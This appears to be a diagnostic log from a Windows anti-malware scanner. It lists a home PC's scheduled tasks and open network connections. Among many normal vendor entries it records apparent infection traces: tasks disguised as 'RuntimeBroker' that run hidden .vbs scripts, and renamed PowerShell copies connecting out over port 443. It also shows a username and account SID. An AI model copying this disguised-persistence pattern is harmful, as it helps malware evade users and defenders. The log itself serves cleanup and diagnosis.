C:\WINDOWS\System32\MbaeParserTask.exe error getting file info Script: Quarantine, Delete, Delete via BC	x64	MNO Metadata Parser Script: Delete scheduler task			C:\WINDOWS\system32\Tasks\Microsoft\Windows\Mobile Broadband Accounts\	%SystemRoot%\System32\MbaeParserTask.exe
C:\Windows\System32\OOBE\SetupPlatform\SetupPlatform.exe 265.33 kb, RsAh, created: 23.07.2023 03:16:47, modified: 05.05.2023 09:21:22 Script: Quarantine, Delete, Delete via BC	x64	SnapshotCleanupTask Script: Delete scheduler task	SetupPlatform module	© Microsoft Corporation. All rights reserved.	C:\WINDOWS\system32\Tasks\Microsoft\Windows\Setup\	C:\Windows\System32\OOBE\SetupPlatform\SetupPlatform.exe -removesnapshot
C:\WINDOWS\system32\MusNotification.exe error getting file info Script: Quarantine, Delete, Delete via BC	x64	MusUx_UpdateInterval Script: Delete scheduler task			C:\WINDOWS\system32\Tasks\Microsoft\Windows\UpdateOrchestrator\	%systemroot%\system32\MusNotification.exe Display
C:\WINDOWS\system32\MusNotification.exe error getting file info Script: Quarantine, Delete, Delete via BC	x64	Reboot Script: Delete scheduler task			C:\WINDOWS\system32\Tasks\Microsoft\Windows\UpdateOrchestrator\	%systemroot%\system32\MusNotification.exe ReadyToReboot
C:\WINDOWS\system32\MusNotification.exe error getting file info Script: Quarantine, Delete, Delete via BC	x64	Reboot_AC Script: Delete scheduler task			C:\WINDOWS\system32\Tasks\Microsoft\Windows\UpdateOrchestrator\	%systemroot%\system32\MusNotification.exe /RunOnAC RebootDialog
C:\WINDOWS\system32\MusNotification.exe error getting file info Script: Quarantine, Delete, Delete via BC	x64	Reboot_Battery Script: Delete scheduler task			C:\WINDOWS\system32\Tasks\Microsoft\Windows\UpdateOrchestrator\	%systemroot%\system32\MusNotification.exe /RunOnBattery RebootDialog
C:\WINDOWS\system32\MusNotification.exe error getting file info Script: Quarantine, Delete, Delete via BC	x64	USO_UxBroker Script: Delete scheduler task			C:\WINDOWS\system32\Tasks\Microsoft\Windows\UpdateOrchestrator\	%systemroot%\system32\MusNotification.exe
C:\WINDOWS\system32\MusNotification.exe error getting file info Script: Quarantine, Delete, Delete via BC	x64	USO_UxBroker_Display Script: Delete scheduler task			C:\WINDOWS\system32\Tasks\Microsoft\Windows\UpdateOrchestrator\	%systemroot%\system32\MusNotification.exe Display
C:\WINDOWS\system32\MusNotification.exe error getting file info Script: Quarantine, Delete, Delete via BC	x64	USO_UxBroker_ReadyToReboot Script: Delete scheduler task			C:\WINDOWS\system32\Tasks\Microsoft\Windows\UpdateOrchestrator\	%systemroot%\system32\MusNotification.exe ReadyToReboot
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MpCmdRun.exe 1611.37 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33 Script: Quarantine, Delete, Delete via BC	x64	Windows Defender Cache Maintenance Script: Delete scheduler task	Microsoft Malware Protection Command Line Utility	© Microsoft Corporation. All rights reserved.	C:\WINDOWS\system32\Tasks\Microsoft\Windows\Windows Defender\	C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MpCmdRun.exe -IdleTask -TaskName WdCacheMaintenance
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MpCmdRun.exe 1611.37 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33 Script: Quarantine, Delete, Delete via BC	x64	Windows Defender Cleanup Script: Delete scheduler task	Microsoft Malware Protection Command Line Utility	© Microsoft Corporation. All rights reserved.	C:\WINDOWS\system32\Tasks\Microsoft\Windows\Windows Defender\	C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MpCmdRun.exe -IdleTask -TaskName WdCleanup
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MpCmdRun.exe 1611.37 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33 Script: Quarantine, Delete, Delete via BC	x64	Windows Defender Scheduled Scan Script: Delete scheduler task	Microsoft Malware Protection Command Line Utility	© Microsoft Corporation. All rights reserved.	C:\WINDOWS\system32\Tasks\Microsoft\Windows\Windows Defender\	C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MpCmdRun.exe Scan -ScheduleJob -ScanTrigger 55 -IdleScheduledJob
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MpCmdRun.exe 1611.37 kb, rsAh, created: 13.06.2023 20:41:35, modified: 13.06.2023 20:41:33 Script: Quarantine, Delete, Delete via BC	x64	Windows Defender Verification Script: Delete scheduler task	Microsoft Malware Protection Command Line Utility	© Microsoft Corporation. All rights reserved.	C:\WINDOWS\system32\Tasks\Microsoft\Windows\Windows Defender\	C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23050.5-0\MpCmdRun.exe -IdleTask -TaskName WdVerification
C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log 6.44 kb, rsAh, created: 22.04.2020 12:25:01, modified: 23.07.2023 13:23:27 Script: Quarantine, Delete, Delete via BC	x64	NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} Script: Delete scheduler task			C:\WINDOWS\system32\Tasks\	C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe -d "C:\Program Files\NVIDIA Corporation\NvDriverUpdateCheck" -l 3 -f C:\ProgramData\NVIDIA\NvContainerDriverUpdateCheck.log WorkingDirectory=C:\Program Files\NVIDIA Corporation\NvContainer
C:\Users\Isaac\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe 4028.92 kb, rsAh, created: 22.04.2020 08:12:15, modified: 22.07.2023 00:30:13 Script: Quarantine, Delete, Delete via BC	x64	OneDrive Reporting Task-S-1-5-21-1347779806-3341832456-1933409962-1001 Script: Delete scheduler task	Standalone Updater	© Microsoft Corporation. All rights reserved.	C:\WINDOWS\system32\Tasks\	%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe /reporting
C:\Users\Isaac\AppData\Local\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe 4028.92 kb, rsAh, created: 22.04.2020 08:12:15, modified: 22.07.2023 00:30:13 Script: Quarantine, Delete, Delete via BC	x64	OneDrive Standalone Update Task-S-1-5-21-1347779806-3341832456-1933409962-1001 Script: Delete scheduler task	Standalone Updater	© Microsoft Corporation. All rights reserved.	C:\WINDOWS\system32\Tasks\	%localappdata%\Microsoft\OneDrive\OneDriveStandaloneUpdater.exe
C:\Users\Isaac\AppData\Local\Programs\Opera GX\launcher.exe 2584.40 kb, rsAh, created: 06.06.2020 02:00:07, modified: 25.06.2023 16:01:17 Script: Quarantine, Delete, Delete via BC	x64	Opera GX scheduled assistant Autoupdate 1615911360 Script: Delete scheduler task	Opera GX Internet Browser	Copyright Opera Software 2023	C:\WINDOWS\system32\Tasks\	C:\Users\Isaac\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate --component-name=assistant --component-path="C:\Users\Isaac\AppData\Local\Programs\Opera GX\assistant" $(Arg0)
C:\Users\Isaac\AppData\Local\Programs\Opera GX\launcher.exe 2584.40 kb, rsAh, created: 06.06.2020 02:00:07, modified: 25.06.2023 16:01:17 Script: Quarantine, Delete, Delete via BC	x64	Opera GX scheduled Autoupdate 1591426805 Script: Delete scheduler task	Opera GX Internet Browser	Copyright Opera Software 2023	C:\WINDOWS\system32\Tasks\	C:\Users\Isaac\AppData\Local\Programs\Opera GX\launcher.exe --scheduledautoupdate $(Arg0)
C:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe 2579.51 kb, rsAh, created: 16.07.2023 07:11:00, modified: 16.07.2023 07:11:00 Script: Quarantine, Delete, Delete via BC	x64	Overwolf Updater Task Script: Delete scheduler task	OverwolfUpdater	Copyright Overwolf © 2023	C:\WINDOWS\system32\Tasks\	C:\Program Files (x86)\Common Files\Overwolf\OverwolfUpdater.exe /RunningFrom Schedule WorkingDirectory=C:\Program Files (x86)\Overwolf
C:\Users\Isaac\AppData\Roaming\kKGAC.vbs 0.14 kb, rsAh, created: 11.04.2023 21:19:46, modified: 11.04.2023 21:19:46 Script: Quarantine, Delete, Delete via BC	x64	RuntimeBroker_kKGAC Script: Delete scheduler task			C:\WINDOWS\system32\Tasks\	C:\Users\Isaac\AppData\Roaming\kKGAC.vbs
C:\Users\Isaac\AppData\Roaming\tDSul.vbs 0.13 kb, rsAh, created: 04.04.2023 21:18:06, modified: 04.04.2023 21:18:06 Script: Quarantine, Delete, Delete via BC	x64	RuntimeBroker_tDSul Script: Delete scheduler task			C:\WINDOWS\system32\Tasks\	C:\Users\Isaac\AppData\Roaming\tDSul.vbs
C:\Program Files (x86)\GIGABYTE\SmartSurvey\GbtCareBotCmd.exe 136.42 kb, rsAh, created: 06.09.2018 15:53:02, modified: 06.09.2018 15:53:02 Script: Quarantine, Delete, Delete via BC	x64	SmartSurvey Script: Delete scheduler task	GbtCareBotCmd	Copyright © 2018 GIGA-BYTE TECHNOLOGY CO., LTD.	C:\WINDOWS\system32\Tasks\	"C:\Program Files (x86)\GIGABYTE\SmartSurvey\GbtCareBotCmd.exe" -u
D:\TaskbarX_1.6.2.0\TaskbarX.exe error getting file info Script: Quarantine, Delete, Delete via BC	x64	TaskbarX Script: Delete scheduler task			C:\WINDOWS\system32\Tasks\	D:\TaskbarX_1.6.2.0\TaskbarX.exe -tbs=1 -color=16;0;52;100 -as=backeaseout -obas=cubiceaseinout -asp=300 -ptbo=0 -stbo=0 -lr=400 -oblr=400 -sr=0 -ftotc=1 -dtbsowm=1
C:\Program Files\Nefarius Software Solutions\ViGEm Bus Driver\ViGEmBus_Updater.exe 1090.91 kb, rsAh, created: 27.09.2022 09:16:59, modified: 27.09.2022 09:16:59 Script: Quarantine, Delete, Delete via BC	x64	ViGEmBus_Updater Script: Delete scheduler task	ViGEmBus_Updater 1.21.442	Copyright (C) 2022 Nefarius Software Solutions e.U.	C:\WINDOWS\system32\Tasks\	C:\Program Files\Nefarius Software Solutions\ViGEm Bus Driver\ViGEmBus_Updater.exe /silent WorkingDirectory=C:\Program Files\Nefarius Software Solutions\ViGEm Bus Driver\
Items found - 150, recognized as trusted - 120

Namespace providers (NSP)

Manufacturer	Status	EXE file	Redirector	Description	Manufacturer	GUID
Items found - 14, recognized as trusted - 14

Transport protocol providers (TSP, LSP)

Protocol Name	EXE file	Redirector	Description	Manufacturer
Items found - 28, recognized as trusted - 28

TCP/UDP ports

Port	Status	Remote Host	Remote Port	Application	Redirector	Notes	Description	Manufacturer
TCP ports
445	LISTENING	0.0.0.0	0	System [4] error getting file info Script: Quarantine, Delete, Delete via BC, Terminate	x64	Microsoft NET
2869	LISTENING	0.0.0.0	0	System [4] error getting file info Script: Quarantine, Delete, Delete via BC, Terminate	x64
5357	LISTENING	0.0.0.0	0	System [4] error getting file info Script: Quarantine, Delete, Delete via BC, Terminate	x64
27036	LISTENING	0.0.0.0	0	c:\program files (x86)\steam\steam.exe [13792] 4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Steam	Copyright (C) 2021 Valve Corporation
49665	LISTENING	0.0.0.0	0	wininit.exe [1092] error getting file info Script: Quarantine, Delete, Delete via BC, Terminate	x64
49737	LISTENING	0.0.0.0	0	services.exe [1168] error getting file info Script: Quarantine, Delete, Delete via BC, Terminate	x64
49928	LISTENING	0.0.0.0	0	d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136] 8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743	Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
49929	LISTENING	0.0.0.0	0	d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136] 8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743	Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
6463	LISTENING	0.0.0.0	0	c:\users\isaac\appdata\local\discord\app-1.0.9015\discord.exe [1344] 133346.27 kb, rsAh, created: 12.07.2023 17:42:13, modified: 12.07.2023 17:42:13 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Discord	Copyright (c) 2023 Discord Inc. All rights reserved.
6463	ESTABLISHED	127.0.0.1	50960	c:\users\isaac\appdata\local\discord\app-1.0.9015\discord.exe [1344] 133346.27 kb, rsAh, created: 12.07.2023 17:42:13, modified: 12.07.2023 17:42:13 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Discord	Copyright (c) 2023 Discord Inc. All rights reserved.
8612	LISTENING	0.0.0.0	0	System [4] error getting file info Script: Quarantine, Delete, Delete via BC, Terminate	x64
9009	LISTENING	0.0.0.0	0	System [4] error getting file info Script: Quarantine, Delete, Delete via BC, Terminate	x64
9010	LISTENING	0.0.0.0	0	c:\program files\lghub\lghub_agent.exe [18324] 46108.25 kb, rsAh, created: 23.06.2023 12:22:49, modified: 23.06.2023 12:22:46 Script: Quarantine, Delete, Delete via BC, Terminate	x64		LGHUB Agent	Copyright © Logitech, Inc. 2023
9010	ESTABLISHED	127.0.0.1	49984	c:\program files\lghub\lghub_agent.exe [18324] 46108.25 kb, rsAh, created: 23.06.2023 12:22:49, modified: 23.06.2023 12:22:46 Script: Quarantine, Delete, Delete via BC, Terminate	x64		LGHUB Agent	Copyright © Logitech, Inc. 2023
9010	ESTABLISHED	127.0.0.1	49992	c:\program files\lghub\lghub_agent.exe [18324] 46108.25 kb, rsAh, created: 23.06.2023 12:22:49, modified: 23.06.2023 12:22:46 Script: Quarantine, Delete, Delete via BC, Terminate	x64		LGHUB Agent	Copyright © Logitech, Inc. 2023
9080	LISTENING	0.0.0.0	0	c:\program files\lghub\lghub_agent.exe [18324] 46108.25 kb, rsAh, created: 23.06.2023 12:22:49, modified: 23.06.2023 12:22:46 Script: Quarantine, Delete, Delete via BC, Terminate	x64		LGHUB Agent	Copyright © Logitech, Inc. 2023
9100	LISTENING	0.0.0.0	0	c:\program files\lghub\lghub_updater.exe [6160] 10341.75 kb, rsAh, created: 23.06.2023 12:22:50, modified: 23.06.2023 12:22:46 Script: Quarantine, Delete, Delete via BC, Terminate	x64		LGHUB Updater	Copyright © Logitech, Inc. 2023
9100	ESTABLISHED	127.0.0.1	49990	c:\program files\lghub\lghub_updater.exe [6160] 10341.75 kb, rsAh, created: 23.06.2023 12:22:50, modified: 23.06.2023 12:22:46 Script: Quarantine, Delete, Delete via BC, Terminate	x64		LGHUB Updater	Copyright © Logitech, Inc. 2023
9180	LISTENING	0.0.0.0	0	c:\program files\lghub\lghub_updater.exe [6160] 10341.75 kb, rsAh, created: 23.06.2023 12:22:50, modified: 23.06.2023 12:22:46 Script: Quarantine, Delete, Delete via BC, Terminate	x64		LGHUB Updater	Copyright © Logitech, Inc. 2023
27015	LISTENING	0.0.0.0	0	c:\program files\common files\apple\mobile device support\applemobiledeviceservice.exe [6140] 100.84 kb, rsAh, created: 08.10.2022 03:00:46, modified: 08.10.2022 03:00:46 Script: Quarantine, Delete, Delete via BC, Terminate	x64	Half-Life	MobileDeviceService	© 2022 Apple Inc. All rights reserved.
27060	LISTENING	0.0.0.0	0	c:\program files (x86)\steam\steam.exe [13792] 4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Steam	Copyright (C) 2021 Valve Corporation
45654	LISTENING	0.0.0.0	0	c:\program files\lghub\lghub_agent.exe [18324] 46108.25 kb, rsAh, created: 23.06.2023 12:22:49, modified: 23.06.2023 12:22:46 Script: Quarantine, Delete, Delete via BC, Terminate	x64		LGHUB Agent	Copyright © Logitech, Inc. 2023
49675	ESTABLISHED	127.0.0.1	5354	c:\program files\common files\apple\mobile device support\applemobiledeviceservice.exe [6140] 100.84 kb, rsAh, created: 08.10.2022 03:00:46, modified: 08.10.2022 03:00:46 Script: Quarantine, Delete, Delete via BC, Terminate	x64		MobileDeviceService	© 2022 Apple Inc. All rights reserved.
49676	ESTABLISHED	127.0.0.1	5354	c:\program files\common files\apple\mobile device support\applemobiledeviceservice.exe [6140] 100.84 kb, rsAh, created: 08.10.2022 03:00:46, modified: 08.10.2022 03:00:46 Script: Quarantine, Delete, Delete via BC, Terminate	x64		MobileDeviceService	© 2022 Apple Inc. All rights reserved.
49914	ESTABLISHED	127.0.0.1	49915	d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136] 8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743	Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
49915	ESTABLISHED	127.0.0.1	49914	d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136] 8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743	Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
49930	ESTABLISHED	127.0.0.1	49931	d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136] 8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743	Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
49931	ESTABLISHED	127.0.0.1	49930	d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136] 8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743	Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
49984	ESTABLISHED	127.0.0.1	9010	c:\program files\lghub\system_tray\lghub_system_tray.exe [17900] 21525.25 kb, rsAh, created: 23.06.2023 12:22:50, modified: 23.06.2023 12:22:47 Script: Quarantine, Delete, Delete via BC, Terminate	x64		G HUB	Copyright © Logitech, Inc. 2023
49990	ESTABLISHED	127.0.0.1	9100	c:\program files\lghub\lghub_agent.exe [18324] 46108.25 kb, rsAh, created: 23.06.2023 12:22:49, modified: 23.06.2023 12:22:46 Script: Quarantine, Delete, Delete via BC, Terminate	x64		LGHUB Agent	Copyright © Logitech, Inc. 2023
49992	ESTABLISHED	127.0.0.1	9010	c:\program files\lghub\lghub.exe [17472] 148462.75 kb, rsAh, created: 23.06.2023 12:22:48, modified: 23.06.2023 12:22:46 Script: Quarantine, Delete, Delete via BC, Terminate	x64		LGHUB	Copyright (c) Logitech, Inc. 2023
50879	LISTENING	0.0.0.0	0	c:\program files (x86)\steam\steam.exe [13792] 4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Steam	Copyright (C) 2021 Valve Corporation
50879	ESTABLISHED	127.0.0.1	50891	c:\program files (x86)\steam\steam.exe [13792] 4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Steam	Copyright (C) 2021 Valve Corporation
50880	LISTENING	0.0.0.0	0	c:\program files (x86)\steam\steam.exe [13792] 4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Steam	Copyright (C) 2021 Valve Corporation
50880	ESTABLISHED	127.0.0.1	50890	c:\program files (x86)\steam\steam.exe [13792] 4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Steam	Copyright (C) 2021 Valve Corporation
50890	ESTABLISHED	127.0.0.1	50880	c:\program files (x86)\steam\bin\cef\cef.win7x64\steamwebhelper.exe [5312] 6992.35 kb, rsAh, created: 29.04.2020 11:57:29, modified: 21.07.2023 14:04:22 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Steam Client WebHelper	Copyright (C) 2014 Valve Corporation
50891	ESTABLISHED	127.0.0.1	50879	c:\program files (x86)\steam\bin\cef\cef.win7x64\steamwebhelper.exe [5312] 6992.35 kb, rsAh, created: 29.04.2020 11:57:29, modified: 21.07.2023 14:04:22 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Steam Client WebHelper	Copyright (C) 2014 Valve Corporation
50960	ESTABLISHED	127.0.0.1	6463	c:\program files\lghub\lghub_agent.exe [18324] 46108.25 kb, rsAh, created: 23.06.2023 12:22:49, modified: 23.06.2023 12:22:46 Script: Quarantine, Delete, Delete via BC, Terminate	x64		LGHUB Agent	Copyright © Logitech, Inc. 2023
53706	SYN_SENT	127.0.0.1	28194	c:\program files\lghub\lghub_agent.exe [18324] 46108.25 kb, rsAh, created: 23.06.2023 12:22:49, modified: 23.06.2023 12:22:46 Script: Quarantine, Delete, Delete via BC, Terminate	x64		LGHUB Agent	Copyright © Logitech, Inc. 2023
139	LISTENING	0.0.0.0	0	System [4] error getting file info Script: Quarantine, Delete, Delete via BC, Terminate	x64	Microsoft NET
8612	LISTENING	0.0.0.0	0	System [4] error getting file info Script: Quarantine, Delete, Delete via BC, Terminate	x64
9009	LISTENING	0.0.0.0	0	System [4] error getting file info Script: Quarantine, Delete, Delete via BC, Terminate	x64
49822	ESTABLISHED	192.168.0.120	445	System [4] error getting file info Script: Quarantine, Delete, Delete via BC, Terminate	x64
49920	ESTABLISHED	157.240.249.17	443	d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136] 8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743	Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
49932	ESTABLISHED	157.240.249.17	443	d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136] 8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743	Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
50874	TIME_WAIT	34.120.195.249	443	[0]	x64
50878	ESTABLISHED	162.159.136.234	443	c:\users\isaac\appdata\local\discord\app-1.0.9015\discord.exe [9212] 133346.27 kb, rsAh, created: 12.07.2023 17:42:13, modified: 12.07.2023 17:42:13 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Discord	Copyright (c) 2023 Discord Inc. All rights reserved.
50884	ESTABLISHED	162.254.193.102	27028	c:\program files (x86)\steam\steam.exe [13792] 4271.85 kb, rsAh, created: 21.05.2018 19:30:20, modified: 21.07.2023 14:04:18 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Steam	Copyright (C) 2021 Valve Corporation
50924	ESTABLISHED	35.186.224.47	443	c:\users\isaac\appdata\local\discord\app-1.0.9015\discord.exe [9212] 133346.27 kb, rsAh, created: 12.07.2023 17:42:13, modified: 12.07.2023 17:42:13 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Discord	Copyright (c) 2023 Discord Inc. All rights reserved.
51044	ESTABLISHED	104.20.68.143	443	c:\users\isaac\appdata\roaming\tdsul.bat.exe [15860] 411.00 kb, rSaH, created: 23.07.2023 02:12:17, modified: 07.05.2022 00:20:22 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Windows PowerShell	© Microsoft Corporation. All rights reserved.
51064	ESTABLISHED	104.20.68.143	443	c:\users\isaac\appdata\roaming\tmaie.bat.exe [13932] 411.00 kb, rSaH, created: 11.04.2023 21:19:39, modified: 07.05.2022 00:20:22 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Windows PowerShell	© Microsoft Corporation. All rights reserved.
51617	TIME_WAIT	72.21.81.200	80	[0]	x64
51939	ESTABLISHED	40.83.247.108	443	c:\program files (x86)\microsoft\edge\application\msedge.exe [17488] 3992.45 kb, rsAh, created: 22.05.2021 04:55:33, modified: 21.07.2023 02:00:56 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Microsoft Edge	Copyright Microsoft Corporation. All rights reserved.
51949	ESTABLISHED	192.168.0.55	8008	c:\program files (x86)\microsoft\edge\application\msedge.exe [17488] 3992.45 kb, rsAh, created: 22.05.2021 04:55:33, modified: 21.07.2023 02:00:56 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Microsoft Edge	Copyright Microsoft Corporation. All rights reserved.
51967	ESTABLISHED	192.168.0.55	8009	c:\program files (x86)\microsoft\edge\application\msedge.exe [17488] 3992.45 kb, rsAh, created: 22.05.2021 04:55:33, modified: 21.07.2023 02:00:56 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Microsoft Edge	Copyright Microsoft Corporation. All rights reserved.
51971	TIME_WAIT	8.8.8.8	443	[0]	x64
52021	ESTABLISHED	192.168.0.55	8009	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
52025	ESTABLISHED	142.251.166.188	5228	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
52036	TIME_WAIT	142.250.191.133	443	[0]	x64
52042	ESTABLISHED	192.168.0.145	8009	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
52043	ESTABLISHED	192.168.0.196	8009	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
52069	ESTABLISHED	192.168.0.191	8009	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
52079	ESTABLISHED	192.168.0.117	8009	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
52096	TIME_WAIT	8.8.4.4	443	[0]	x64
52097	TIME_WAIT	172.217.0.174	443	[0]	x64
52106	ESTABLISHED	31.13.93.49	443	d:\oculus\support\oculus-runtime\ovrserver_x64.exe [8136] 8821.55 kb, rsAh, created: 06.07.2023 17:34:03, modified: 06.07.2023 17:34:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		OVRServer_x64.exe (CAPI: 1.87.0) 1997bc10accd-public SC:5146550886258743	Copyright (c) Facebook Technologies, LLC and its affiliates. All rights reserved.
52122	ESTABLISHED	52.96.66.162	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
52133	TIME_WAIT	52.96.164.162	443	[0]	x64
52161	TIME_WAIT	172.217.0.170	443	[0]	x64
52168	TIME_WAIT	142.250.190.106	443	[0]	x64
52218	TIME_WAIT	142.250.191.195	443	[0]	x64
52220	TIME_WAIT	142.250.191.209	443	[0]	x64
52293	TIME_WAIT	172.217.4.195	443	[0]	x64
52296	TIME_WAIT	142.250.190.10	443	[0]	x64
52307	TIME_WAIT	52.96.79.162	443	[0]	x64
52308	TIME_WAIT	52.96.79.162	443	[0]	x64
52311	TIME_WAIT	52.96.226.130	443	[0]	x64
52314	TIME_WAIT	52.154.48.127	443	[0]	x64
52318	TIME_WAIT	52.111.227.1	443	[0]	x64
52322	ESTABLISHED	52.111.227.1	443	c:\program files (x86)\google\chrome\application\chrome.exe [24832] 3157.77 kb, rsAh, created: 22.04.2020 08:19:56, modified: 20.07.2023 08:58:14 Script: Quarantine, Delete, Delete via BC, Terminate	x64		Google Chrome	Copyright 2023 Google LLC. All rights reserved.
52346	TIME_WAIT	142.250.190.13	443	[0]	x64
52349	TIME_WAIT	108.157.150.91	443	[0]	x64
52358	TIME_WAIT	142.250.190.10	443	[0]	x64
52363	TIME_WAIT	172.217.1.110	443	[0]	x64
52364	TIME_WAIT	172.217.4.200	443	[0]	x64
52368	TIME_WAIT	142.250.123.157	443	[0]	x64
52374	TIME_WAIT	142.250.190.132	443	[0]	x64
52380	TIME_WAIT	23.220.161.5	80	[0]	x64
